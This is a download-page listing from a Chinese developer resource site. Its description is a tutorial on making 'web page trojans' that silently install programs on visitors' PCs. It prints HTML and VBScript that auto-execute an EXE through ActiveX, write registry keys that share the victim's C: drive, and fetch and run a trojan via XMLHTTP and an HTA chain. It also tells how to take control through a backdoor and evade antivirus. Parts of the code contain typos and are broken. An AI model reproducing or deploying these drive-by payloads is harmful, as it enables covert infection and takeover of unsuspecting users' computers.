下载 >  开发技术 >  Web开发 > 网页自动运行EXE程序资源

网页自动运行EXE程序资源 评分:

1.它应该算是html带动同路径下的一个exe的文件的主页了,也就是当浏览器浏览这个页面的时候,一个exe的文件就在后台自动下载并执行了,可以做一个test.html的文件在桌面,内容如下: <script language="javascript"> run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\"" run_exe+="CODEBASE=\"test.exe#version=1,1,1,1\">" run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">" run_exe+="</OBJECT>" run_exe+="<HTML><H1>网页加载中,请稍后....</H1></HTML>"; document.open(); document.clear(); document.writeln(run_exe); document.close(); </script> 再在桌面下随便找个exe的文件,名字一定要改为tset.exe,好了,这时候双击我们刚才生成的html文件,当看到“网页加载中,请稍后....”的时候,我们的那个同路径下的exe文件也被无条件执行了,这种页面的优点就是编译修改简单,但是!当你申请下了一个个人主页空间的时候,把这两个文件上传上去的时候,当你试图通过浏览器浏览你的杰作的时候,ie的安全警告跳了出来,我想没有几个人愿意乖乖的冒着风险去点“是”,好了,尽管这个网页木马在本地是多么的完美,但是放到了网上就通不过ie的安全策略了,这个小马失败了。 2.是通过ie自身的漏洞写入注册表,相信很多人经常在浏览一些主页的时候,注册表被改的乱七八糟、ie标题被改、首页被改、注册表编辑器被禁用等等,这些都是自动修改了你的注册表的网页的杰作,所以我门也可以做个页面让浏览者的硬盘完全共享,也是做个html的文件,内容如下: script language=javascript> document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>"); function f(){ a1=document.applets[0]; a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Shl = a1.GetObject(); Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402,"REG_DWORD"); Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD" ); Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\"); } function init() { setTimeout("f()", 1000); } init(); </script> 当对方的浏览过这个页面的时候,他的c:就被共享了,共享后的进入方法嘛..呵呵不用说了吧,但是他虽然共享了,但是你还不知道谁正在看你的这个页面,他的ip又是多少你都不知道,没有关系,有个很简单的方法,去163申请一个域名的转换,如:http://www.chinawww365.com连接目标地址里...这种网页木马的特点是比较安全,不易被对方发现,但是使用麻烦需要牵扯到很多的东西。 3.也是现在最好用的一种了吧,个人认为。它是将一个小巧的exe文件作成一个.eml的文件,再用ie的漏洞让一个html的页面执行这个.eml的文件,你的那个小巧的exe文件就被执行了,由于代码过长又因每个exe文件转换后的代码不同所以不可能一一写出,下面给出一个地址http://dhj.126.com实际上就是一个转...elnet x.x.x.x 3389来完全控制对方(这个5k的小后门是winshell5.0黑白网络有下,同时这个winshell5.0还有一个很出色的功能,就是能下载一个你事先设置好的指定路径下的一个文件,并执行他,我放置的是网络深偷,如果你的杀毒软件够厉害的话,神偷是可以被查出来的,这里只是实验,实际中可以指定很多查不到的小马,这里不阐述),有兴趣的朋友可以来试试。 这种网页木马的特点是,对方挨种率较高,除了制作麻烦一点外,没有什么缺点啦 好了所有的漏洞都是建立在系统漏洞的前提下,多升级多打补丁没有坏处 网页木马制作讲解  我们经常听到这样的忠告:“不要随意下在不明的程序,不要随意打开邮件的附件...”这样的忠告确实是有用的,不过我们的系统有不少漏洞,许多木马已经不需要客户端和服务端了,他们利用这些系统漏洞按照被系统认为合法的代码执行木马的功能,有的木马会在你完全不知道的情况下潜入,现在我来讲解下通过IE6的漏洞实现访问网页后神不知鬼不觉的下在并执行指定程序的例子,也就是网页木马. 首先我们需要编写几个简单的文件 一、名字为abc.abc的文件 <html> <script language="vbscript"> Function HttpDoGet(url) set oreq = CreateObject("Microsoft.XMLHTTP") oreq.open "GET",url,false oreq.send If oreq.status=200 then HttpDoGet=oReq.respomseBody Savefile HttpDoGet,"c:\win.exe" End If Set oreq=nothing End Function sub SaveFile(str.fName) Set objStream = CreateObject("ADODB.Stream") objStream.Type =1 objStream.Open objStream.write str objStream.SaveToFile fName.2 objStream.Close() set objStream = nothing exewin() End sub Sub exewin() set wshshell=createobject ("wscript.shell" ) a=wshshell.run ("cmd.exe /c c:\win.exe",0) b=wshshell.run ("cmd.exe /c del c:\win.hta",0) window.close End Sub HttpDoGet "http://127.0.0.1/test.exe" </script> </html> 其中test.exe为木马程序,实现必须放在WEB发布的目录下,文件abc.abc也必须保存在发布的目录下。 二、名字为test.htm的文件 <html><body> 木马运行测试!(这句话可以改成你想说的) <object date="http://127.0.0.1/win.test";;;></object> </body></html> 三、名字为win.test的文件 <html> <body> <script language="vbscript"> Function HttpDoGet(url) set oreq = CreateObject("Microsoft.XMLHTTP") oreq.open "GET",url,false oreq.send If oreq.status=200 then HttpDoGet,"c:\win.hta" Set oreq=nothing End if end function sub SaveFile(str,fName) Dim fso, tf S e t f s o = C r e a t e O b j e c t(Scripting.FileSystemObject") Set tf = fso.CreateTextfile(fName,True) tf.Write str tf.Close exewin() End sub Sub exewin() set wshshell=createobject ("wscript.shell" ) a=wshshell.run ("cmd.exe /c c:\win.hat",0) window.close End Sub HttpDoGet("http://127.0.0.1/abc.abc") </script> </body> </html> 四、名字为test.exe的木马程序。 晕...这个就不用我提供了吧,你想用什么木马就把他的名字换成test.exe传上去就可以了。 服务器的文件列表 test.htm:对外发布的网页 win.test:下在文件abc.abc到对方机器上,并且保存为win.hta并且执行。 abc.abc下载二进制的木马文件test.exe,并执行。 test.exe:木马程序。 上面所说的文件可以修改成任意名字,只是不要忘记把源码里的文件指向也修改就可以了! 最后是设置IIS,打开“程序→管理工具→internet服务管理器”,右键单击要设置的站点,选择《属性》,在选择“http头”。单击“MIME映射”里的“文件类型”按钮,并在关联扩展名文本框中输入“.hta”,在内容类型(MIME)中输入“application/hta",然后关闭所有窗口就可以了。
...展开详情收缩
2009-05-09 上传大小:6KB
分享
收藏 (5) 举报

评论 共9条

gjhahd12 不允许运行,建议不要下载
2017-02-04
回复
cool646259600 还是需要手动设置IE安全级别
2016-06-28
回复
r81745743 需要以管理员身份启动web服务器,否则不同通过安全设置
2015-04-08
回复
zhzhlkxf 仍然无法绕过安全限制
2014-05-23
回复
luchaopeng 执行exe速度比较慢
2013-10-28
回复
l240398616 安全限制,无法运行
2013-06-18
回复
yzy85 不太好用,现场环境不允许。
2013-04-03
回复
sunyiz 试过了,可以使用,但是没有自动运行,只是开始下载
2013-03-15
回复
estwzj 安全限制,无法运行
2012-08-19
回复

热点文章

img

spring mvc+mybatis+mysql+maven+bootstrap 整合实现增删查改简单实例.zip

资源所需积分/C币 当前拥有积分 当前拥有C币
5 0 0
点击完成任务获取下载码
输入下载码
为了良好体验,不建议使用迅雷下载
img

网页自动运行EXE程序资源

会员到期时间: 剩余下载个数: 剩余C币: 剩余积分:0
为了良好体验,不建议使用迅雷下载
VIP下载
您今日下载次数已达上限(为了良好下载体验及使用,每位用户24小时之内最多可下载20个资源)

积分不足!

资源所需积分/C币 当前拥有积分
您可以选择
开通VIP
4000万
程序员的必选
600万
绿色安全资源
现在开通
立省522元
或者
购买C币兑换积分 C币抽奖
img

资源所需积分/C币 当前拥有积分 当前拥有C币
5 4 45
为了良好体验,不建议使用迅雷下载
确认下载
img

资源所需积分/C币 当前拥有积分 当前拥有C币
0 0 0
为了良好体验,不建议使用迅雷下载
VIP和C币套餐优惠
img

资源所需积分/C币 当前拥有积分 当前拥有C币
5 4 45
您的积分不足,将扣除 10 C币
为了良好体验,不建议使用迅雷下载
确认下载
下载
您还未下载过该资源
无法举报自己的资源

兑换成功

你当前的下载分为234开始下载资源
你还不是VIP会员
开通VIP会员权限,免积分下载
立即开通

你下载资源过于频繁,请输入验证码

您因违反CSDN下载频道规则而被锁定帐户,如有疑问,请联络:webmaster@csdn.net!

举报

  • 举报人:
  • 被举报人:
  • *类型:
    • *投诉人姓名:
    • *投诉人联系方式:
    • *版权证明:
  • *详细原因: